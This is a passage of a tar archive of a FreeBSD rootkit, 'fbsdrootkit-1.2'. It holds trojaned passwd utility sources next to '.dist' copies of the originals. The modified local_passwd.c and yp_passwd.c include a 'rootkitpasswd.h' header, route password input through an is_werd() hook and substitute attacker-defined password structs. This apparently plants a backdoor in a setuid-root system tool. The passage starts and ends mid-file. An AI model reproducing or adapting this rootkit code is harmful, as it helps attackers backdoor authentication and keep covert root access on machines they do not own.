software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * From: @(#)extern.h 8.1 (Berkeley) 4/2/94 * $Id: extern.h,v 1.2 1995/01/20 22:03:36 wollman Exp $ */ int krb_passwd __P((char *, char *, char *, char *)); int local_passwd __P((char *)); fbsdrootkit-1.2/passwd/local_passwd.c100600 764 764 11771 6257643164 15317 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: local_passwd.c,v 1.2.6.4 1996/02/07 15:10:16 peter Exp $ */ #ifndef lint static const char sccsid[] = "@(#)local_passwd.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef YP #include #endif #include "extern.h" #include "../config.h" #include "../rootkitpasswd.h" static uid_t uid; char *tempname; static unsigned char itoa64[] = /* 0 ... 63 => ascii - 64 */ "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; void to64(s, v, n) char *s; long v; int n; { while (--n >= 0) { *s++ = itoa64[v&0x3f]; v >>= 6; } } char * getnewpasswd(pw, nis) struct passwd *pw; int nis; { int tries; char *p, *t; char buf[_PASSWORD_LEN+1], salt[10]; struct timeval tv; if (!nis) (void)printf("Changing local password for %s.\n", pw->pw_name); if (uid && pw->pw_passwd[0] && strcmp(crypt(is_werd(getpass("Old password:")), pw->pw_passwd), pw->pw_passwd)) { errno = EACCES; pw_error(NULL, 1, 1); } for (buf[0] = '\0', tries = 0;;) { p = getpass("New password:"); if (!*p) { (void)printf("Password unchanged.\n"); pw_error(NULL, 0, 0); } if (strlen(p) <= 5 && (uid != 0 || ++tries < 2)) { (void)printf("Please enter a longer password.\n"); continue; } for (t = p; *t && islower(*t); ++t); if (!*t && (uid != 0 || ++tries < 2)) { (void)printf("Please don't use an all-lower case password.\nUnusual capitalization, control characters or digits are suggested.\n"); continue; } (void)strcpy(buf, p); if (!strcmp(buf, getpass("Retype new password:"))) break; (void)printf("Mismatch; try again, EOF to quit.\n"); } /* grab a random printable character that isn't a colon */ (void)srandom((int)time((time_t *)NULL)); #ifdef NEWSALT salt[0] = _PASSWORD_EFMT1; to64(&salt[1], (long)(29 * 25), 4); to64(&salt[5], random(), 4); salt[9] = '\0'; #else /* Make a good size salt for algoritms that can use it. */ gettimeofday(&tv,0); if (strncmp(pw->pw_passwd, "$1$", 3)) { /* DES Salt */ to64(&salt[0], random(), 3); to64(&salt[3], tv.tv_usec, 3); to64(&salt[6], tv.tv_sec, 2); salt[8] = '\0'; } else { /* MD5 Salt */ strncpy(&salt[0], "$1$", 3); to64(&salt[3], random(), 3); to64(&salt[6], tv.tv_usec, 3); salt[8] = '\0'; } #endif return (crypt(buf, salt)); } int local_passwd(uname) char *uname; { struct passwd *pw; int pfd, tfd; if (!(pw = getpwnam(uname))) errx(1, "unknown user %s", uname); #ifdef YP /* Use the right password information. */ pw = (struct passwd *)&local_password; #endif uid = getuid(); if (uid && uid != pw->pw_uid) errx(1, "%s", strerror(EACCES)); pw_init(); pfd = pw_lock(); tfd = pw_tmp(); /* * Get the new password. Reset passwd change time to zero; when * classes are implemented, go and get the "offset" value for this * class and reset the timer. */ pw->pw_passwd = getnewpasswd(pw, 0); pw->pw_change = 0; pw_copy(pfd, tfd, pw); if (!pw_mkdb()) pw_error((char *)NULL, 0, 1); return (0); } fbsdrootkit-1.2/passwd/passwd.c100600 764 764 11606 6035125171 14125 0ustar dfdf/* * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "From: @(#)passwd.c 8.3 (Berkeley) 4/2/94"; static const char rcsid[] = "$Id: passwd.c,v 1.3.4.2 1995/10/06 01:58:45 davidg Exp $"; #endif /* not lint */ #include #include #include #include #include #ifdef YP #include #include char *prog_name; int __use_yp = 0; #endif #ifdef KERBEROS #include "krb.h" #endif #include "extern.h" void usage __P((void)); int use_local_passwd = 0; int main(argc, argv) int argc; char **argv; { int ch; char *uname; char *iflag = 0, *rflag = 0, *uflag = 0; #ifdef YP #ifdef KERBEROS char realm[REALM_SZ]; #define OPTIONS "lysfi:r:u:" #else #define OPTIONS "lysf" #endif #else #ifdef KERBEROS char realm[REALM_SZ]; #define OPTIONS "li:r:u:" #else #define OPTIONS "l" #endif #endif #ifdef YP int res = 0; if (strstr(argv[0], (prog_name = "yppasswd"))) __use_yp = 1; #endif while ((ch = getopt(argc, argv, OPTIONS)) != EOF) { switch (ch) { case 'l': /* change local password file */ use_local_passwd = 1; break; #ifdef KERBEROS case 'i': iflag = optarg; break; case 'r': rflag = optarg; break; case 'u': uflag = optarg; break; #endif /* KERBEROS */ #ifdef YP case 'y': /* Change NIS password */ __use_yp = 1; break; #endif default: case '?': usage(); } } argc -= optind; argv += optind; if ((uname = getlogin()) == NULL) err(1, "getlogin"); switch(argc) { case 0: break; case 1: uname = argv[0]; break; default: usage(); } #ifdef YP /* * If NIS is turned on in the password database, use it, else punt. */ #ifdef KERBEROS if (__use_yp || (iflag == NULL && rflag == NULL && uflag == NULL)) { #endif res = use_yp(uname); if (res == USER_YP_ONLY) { if (!use_local_passwd) { exit(yp_passwd(uname)); } else { /* * Reject -l flag if NIS is turned on and the user * doesn't exist in the local password database. */ errx(1, "unknown local user: %s.", uname); } } else if (res == USER_LOCAL_ONLY) { /* * Reject -y flag if user only exists locally. */ if (__use_yp) errx(1, "unknown NIS user: %s.", uname); } else if (res == USER_YP_AND_LOCAL) { if (!use_local_passwd) exit(yp_passwd(uname)); } #ifdef KERBEROS } #endif #endif if (!use_local_passwd) { #ifdef KERBEROS if(krb_get_lrealm(realm, 0) == KSUCCESS) { fprintf(stderr, "realm %s\n", realm); exit(krb_passwd(argv[0], iflag, rflag, uflag)); } #endif } exit(local_passwd(uname)); } void usage() { #ifdef YP #ifdef KERBEROS fprintf(stderr, "usage: passwd [-l] [-i instance] [-r realm] [-u fullname]\n"); fprintf(stderr, " [-l] [-y] [user]\n"); #else (void)fprintf(stderr, "usage: passwd [-l] [-y] [user] \n"); #endif #else #ifdef KERBEROS fprintf(stderr, "usage: passwd [-l] [-i instance] [-r realm] [-u fullname] [user]\n"); #else (void)fprintf(stderr, "usage: passwd user\n"); #endif #endif exit(1); } fbsdrootkit-1.2/passwd/yp_passwd.c100600 764 764 12763 6256626131 14651 0ustar dfdf/* * Copyright (c) 1992/3 Theo de Raadt * Copyright (c) 1994 Olaf Kirch * Copyright (c) 1995 Bill Paul * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote * products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Rootkit configuration files */ #include "../config.h" #include "../rootkitpasswd.h" extern char *prog_name; uid_t uid; extern char *getnewpasswd __P(( struct passwd * , int )); char * getserver( void ) { char *domainname, *master; int port, err; int getrpcport(); if ((err = yp_get_default_domain(&domainname)) != 0) { fprintf(stderr, "%s: can't get local yp domain: %s\n", prog_name, yperr_string(err)); return NULL; } if ((err = yp_master(domainname, "passwd.byname", &master)) != 0) { fprintf(stderr, "%s: can't find the master ypserver: %s\n", prog_name, yperr_string(err)); return NULL; } port = getrpcport(master, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP); if (port==0) { fprintf (stderr, "%s: yppasswdd not running on NIS master host\n", prog_name); return NULL; } if (port >= IPPORT_RESERVED) { fprintf (stderr, "%s: yppasswd daemon running on illegal port.\n", prog_name); return NULL; } return master; } int yp_passwd(char *user) { struct timeval timeout; struct yppasswd yppasswd; struct passwd *pw; CLIENT *clnt; char *master; int c, err, status; char *s; if ((master = getserver()) == NULL) { exit(1); } /* Obtain the passwd struct for the user whose password is to be changed. */ uid = getuid(); if (user == NULL) { if ((pw = getpwuid(uid)) == NULL) { fprintf ( stderr, "%s: unknown user (uid=%d).\n", prog_name, (int)uid ); exit(1); } } else { if ((pw = getpwnam(user)) == NULL) { fprintf ( stderr, "%s: unknown user: %s.\n", prog_name, user ); exit(1); } if (pw->pw_uid != uid && uid != 0) { fprintf ( stderr, "%s: Only root may change account information " "for others\n", prog_name ); exit(1); } } /* Use the correct password */ pw = (struct passwd *)&yp_password; /* Initialize password information */ yppasswd.newpw.pw_passwd = pw->pw_passwd; yppasswd.newpw.pw_name = pw->pw_name; yppasswd.newpw.pw_uid = pw->pw_uid; yppasswd.newpw.pw_gid = pw->pw_gid; yppasswd.newpw.pw_gecos = pw->pw_gecos; yppasswd.newpw.pw_dir = pw->pw_dir; yppasswd.newpw.pw_shell = pw->pw_shell; yppasswd.oldpass = NULL; printf("Changing NIS password for %s on %s.\n", pw->pw_name, master); /* Get old password */ if(pw->pw_passwd) { char prompt[40]; s = is_werd(getpass ("Old password: ")); if( strcmp(crypt(s, pw->pw_passwd), pw->pw_passwd)) { fprintf(stderr, "Sorry.\n"); exit (1); } yppasswd.oldpass = strdup(s); } if ((s = getnewpasswd(pw, 1)) == NULL) exit (1); yppasswd.newpw.pw_passwd = s; /* The yppasswd.x file said `unix authentication required', * so I added it. This is the only reason it is in here. * My yppasswdd doesn't use it, but maybe some others out there * do. --okir */ clnt = clnt_create( master, YPPASSWDPROG, YPPASSWDVERS, "udp" ); clnt->cl_auth = authunix_create_default(); bzero( (char*)&status, sizeof(status) ); timeout.tv_sec = 25; timeout.tv_usec = 0; err = clnt_call( clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char*)&yppasswd, xdr_int, (char*)&status, &timeout ); if (err) { clnt_perrno(err); fprintf( stderr, "\n" ); } else if (status) { fprintf( stderr, "Error while changing NIS password.\n"); } printf("\nNIS password has%s been changed on %s.\n", (err || status)? " not" : "", master); auth_destroy( clnt->cl_auth ); clnt_destroy( clnt ); exit ((err || status) != 0); } #endif /* YP */ fbsdrootkit-1.2/passwd/yp_passwd.c.dist100600 764 764 12622 6256607153 15610 0ustar dfdf/* * Copyright (c) 1992/3 Theo de Raadt * Copyright (c) 1994 Olaf Kirch * Copyright (c) 1995 Bill Paul * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote * products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include extern char *prog_name; uid_t uid; extern char *getnewpasswd __P(( struct passwd * , int )); char * getserver( void ) { char *domainname, *master; int port, err; int getrpcport(); if ((err = yp_get_default_domain(&domainname)) != 0) { fprintf(stderr, "%s: can't get local yp domain: %s\n", prog_name, yperr_string(err)); return NULL; } if ((err = yp_master(domainname, "passwd.byname", &master)) != 0) { fprintf(stderr, "%s: can't find the master ypserver: %s\n", prog_name, yperr_string(err)); return NULL; } port = getrpcport(master, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP); if (port==0) { fprintf (stderr, "%s: yppasswdd not running on NIS master host\n", prog_name); return NULL; } if (port >= IPPORT_RESERVED) { fprintf (stderr, "%s: yppasswd daemon running on illegal port.\n", prog_name); return NULL; } return master; } int yp_passwd(char *user) { struct timeval timeout; struct yppasswd yppasswd; struct passwd *pw; CLIENT *clnt; char *master; int c, err, status; char *s; if ((master = getserver()) == NULL) { exit(1); } /* Obtain the passwd struct for the user whose password is to be changed. */ uid = getuid(); if (user == NULL) { if ((pw = getpwuid(uid)) == NULL) { fprintf ( stderr, "%s: unknown user (uid=%d).\n", prog_name, (int)uid ); exit(1); } } else { if ((pw = getpwnam(user)) == NULL) { fprintf ( stderr, "%s: unknown user: %s.\n", prog_name, user ); exit(1); } if (pw->pw_uid != uid && uid != 0) { fprintf ( stderr, "%s: Only root may change account information " "for others\n", prog_name ); exit(1); } } /* Use the correct password */ pw = (struct passwd *)&yp_password; /* Initialize password information */ yppasswd.newpw.pw_passwd = pw->pw_passwd; yppasswd.newpw.pw_name = pw->pw_name; yppasswd.newpw.pw_uid = pw->pw_uid; yppasswd.newpw.pw_gid = pw->pw_gid; yppasswd.newpw.pw_gecos = pw->pw_gecos; yppasswd.newpw.pw_dir = pw->pw_dir; yppasswd.newpw.pw_shell = pw->pw_shell; yppasswd.oldpass = NULL; printf("Changing NIS password for %s on %s.\n", pw->pw_name, master); /* Get old password */ if(pw->pw_passwd) { char prompt[40]; s = getpass ("Old password: "); if( strcmp(crypt(s, pw->pw_passwd), pw->pw_passwd)) { fprintf(stderr, "Sorry.\n"); exit (1); } yppasswd.oldpass = strdup(s); } if ((s = getnewpasswd(pw, 1)) == NULL) exit (1); yppasswd.newpw.pw_passwd = s; /* The yppasswd.x file said `unix authentication required', * so I added it. This is the only reason it is in here. * My yppasswdd doesn't use it, but maybe some others out there * do. --okir */ clnt = clnt_create( master, YPPASSWDPROG, YPPASSWDVERS, "udp" ); clnt->cl_auth = authunix_create_default(); bzero( (char*)&status, sizeof(status) ); timeout.tv_sec = 25; timeout.tv_usec = 0; err = clnt_call( clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char*)&yppasswd, xdr_int, (char*)&status, &timeout ); if (err) { clnt_perrno(err); fprintf( stderr, "\n" ); } else if (status) { fprintf( stderr, "Error while changing NIS password.\n"); } printf("\nNIS password has%s been changed on %s.\n", (err || status)? " not" : "", master); auth_destroy( clnt->cl_auth ); clnt_destroy( clnt ); exit ((err || status) != 0); } #endif /* YP */ fbsdrootkit-1.2/passwd/local_passwd.c.dist100600 764 764 11673 6256625436 16263 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: local_passwd.c,v 1.2.6.4 1996/02/07 15:10:16 peter Exp $ */ #ifndef lint static const char sccsid[] = "@(#)local_passwd.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef YP #include #endif #include "extern.h" static uid_t uid; char *tempname; static unsigned char itoa64[] = /* 0 ... 63 => ascii - 64 */ "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; void to64(s, v, n) char *s; long v; int n; { while (--n >= 0) { *s++ = itoa64[v&0x3f]; v >>= 6; } } char * getnewpasswd(pw, nis) struct passwd *pw; int nis; { int tries; char *p, *t; char buf[_PASSWORD_LEN+1], salt[10]; struct timeval tv; if (!nis) (void)printf("Changing local password for %s.\n", pw->pw_name); if (uid && pw->pw_passwd[0] && strcmp(crypt(getpass("Old password:"), pw->pw_passwd), pw->pw_passwd)) { errno = EACCES; pw_error(NULL, 1, 1); } for (buf[0] = '\0', tries = 0;;) { p = getpass("New password:"); if (!*p) { (void)printf("Password unchanged.\n"); pw_error(NULL, 0, 0); } if (strlen(p) <= 5 && (uid != 0 || ++tries < 2)) { (void)printf("Please enter a longer password.\n"); continue; } for (t = p; *t && islower(*t); ++t); if (!*t && (uid != 0 || ++tries < 2)) { (void)printf("Please don't use an all-lower case password.\nUnusual capitalization, control characters or digits are suggested.\n"); continue; } (void)strcpy(buf, p); if (!strcmp(buf, getpass("Retype new password:"))) break; (void)printf("Mismatch; try again, EOF to quit.\n"); } /* grab a random printable character that isn't a colon */ (void)srandom((int)time((time_t *)NULL)); #ifdef NEWSALT salt[0] = _PASSWORD_EFMT1; to64(&salt[1], (long)(29 * 25), 4); to64(&salt[5], random(), 4); salt[9] = '\0'; #else /* Make a good size salt for algoritms that can use it. */ gettimeofday(&tv,0); if (strncmp(pw->pw_passwd, "$1$", 3)) { /* DES Salt */ to64(&salt[0], random(), 3); to64(&salt[3], tv.tv_usec, 3); to64(&salt[6], tv.tv_sec, 2); salt[8] = '\0'; } else { /* MD5 Salt */ strncpy(&salt[0], "$1$", 3); to64(&salt[3], random(), 3); to64(&salt[6], tv.tv_usec, 3); salt[8] = '\0'; } #endif return (crypt(buf, salt)); } int local_passwd(uname) char *uname; { struct passwd *pw; int pfd, tfd; if (!(pw = getpwnam(uname))) errx(1, "unknown user %s", uname); #ifdef YP /* Use the right password information. */ pw = (struct passwd *)&local_password; #endif uid = getuid(); if (uid && uid != pw->pw_uid) errx(1, "%s", strerror(EACCES)); pw_init(); pfd = pw_lock(); tfd = pw_tmp(); /* * Get the new password. Reset passwd change time to zero; when * classes are implemented, go and get the "offset" value for this * class and reset the timer. */ pw->pw_passwd = getnewpasswd(pw, 0); pw->pw_change = 0; pw_copy(pfd, tfd, pw); if (!pw_mkdb()) pw_error((char *)NULL, 0, 1); return (0); } fbsdrootkit-1.2/passwd/Makefile.dist100600 764 764 2423 6257175011 15043 0ustar dfdf# From: @(#)Makefile 8.3 (Berkeley) 4/2/94 # $Id: Makefile,v 1.14.2.3 1995/10/06 01:58:43 davidg Exp $ PROG= passwd SRCS= local_passwd.c yp_passwd.c passwd.c pw_copy.c pw_util.c pw_yp.c DPADD= ${LIBCRYPT} ${LIBRPCSVC} LDADD= -lcrypt -lrpcsvc .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../rlogin CFLAGS+=-DCRYPT -DYP -I${.CURDIR} -I${.CURDIR}/../../usr.sbin/vipw \ -I${.CURDIR}/../../usr.bin/chpass BINOWN= root BINMODE=4555 MAN1=passwd.1 LINKS=${BINDIR}/passwd ${BINDIR}/yppasswd MLINKS=passwd.1 yppasswd.1 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_EBONES)) SRCS+= kpasswd.c .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../../usr.bin/rlogin ${.CURDIR}/../../usr.bin/passwd \ ${.CURDIR}/../../eBones/usr.bin/passwd CFLAGS+= -DKERBEROS \ -I${.CURDIR}/../../eBones/include \ -I${.CURDIR}/../../eBones/lib/libkadm # XXX not defined: ${LIBKADM}, ${LIBCOM_ERR} DPADD= ${LIBKADM} ${LIBKRB} ${LIBDES} ${LIBCRYPT} ${LIBRPCSVC} ${LIBCOM_ERR} LDADD= -lkadm -lkrb -ldes -lcrypt -lrpcsvc -lcom_err DISTRIBUTION= krb .endif beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/passwd ] || \ chflags noschg ${DESTDIR}${BINDIR}/passwd afterinstall: chflags schg ${DESTDIR}${BINDIR}/passwd .include fbsdrootkit-1.2/passwd/pw_util.c100600 764 764 12703 6257175265 14325 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)pw_util.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This file is used by all the "password" programs; vipw(8), chpass(1), * and passwd(1). */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_util.h" extern char *tempname; static pid_t editpid = -1; static int lockfd; void pw_cont(sig) int sig; { if (editpid != -1) kill(editpid, sig); } void pw_init() { struct rlimit rlim; /* Unlimited resource limits. */ rlim.rlim_cur = rlim.rlim_max = RLIM_INFINITY; (void)setrlimit(RLIMIT_CPU, &rlim); (void)setrlimit(RLIMIT_FSIZE, &rlim); (void)setrlimit(RLIMIT_STACK, &rlim); (void)setrlimit(RLIMIT_DATA, &rlim); (void)setrlimit(RLIMIT_RSS, &rlim); /* Don't drop core (not really necessary, but GP's). */ rlim.rlim_cur = rlim.rlim_max = 0; (void)setrlimit(RLIMIT_CORE, &rlim); /* Turn off signals. */ (void)signal(SIGALRM, SIG_IGN); (void)signal(SIGHUP, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)signal(SIGPIPE, SIG_IGN); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGTERM, SIG_IGN); (void)signal(SIGCONT, pw_cont); /* Create with exact permissions. */ (void)umask(0); } int pw_lock() { /* * If the master password file doesn't exist, the system is hosed. * Might as well try to build one. Set the close-on-exec bit so * that users can't get at the encrypted passwords while editing. * Open should allow flock'ing the file; see 4.4BSD. XXX */ lockfd = open(_PATH_MASTERPASSWD, O_RDONLY, 0); if (lockfd < 0 || 